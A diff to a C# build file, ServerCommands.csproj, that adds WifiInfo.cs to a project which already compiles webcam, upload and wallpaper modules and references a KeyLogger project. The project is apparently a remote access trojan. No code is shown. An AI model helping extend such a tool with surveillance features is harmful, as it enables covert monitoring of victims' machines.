--- a/ServerCommands/ServerCommands.csproj
+++ b/ServerCommands/ServerCommands.csproj
@@ -71,6 +71,7 @@
     <Compile Include="Upload.cs" />
     <Compile Include="Wallpaper.cs" />
     <Compile Include="Webcam.cs" />
+    <Compile Include="WifiInfo.cs" />
   </ItemGroup>
   <ItemGroup>
     <ProjectReference Include="..\KeyLogger\KeyLogger.csproj">
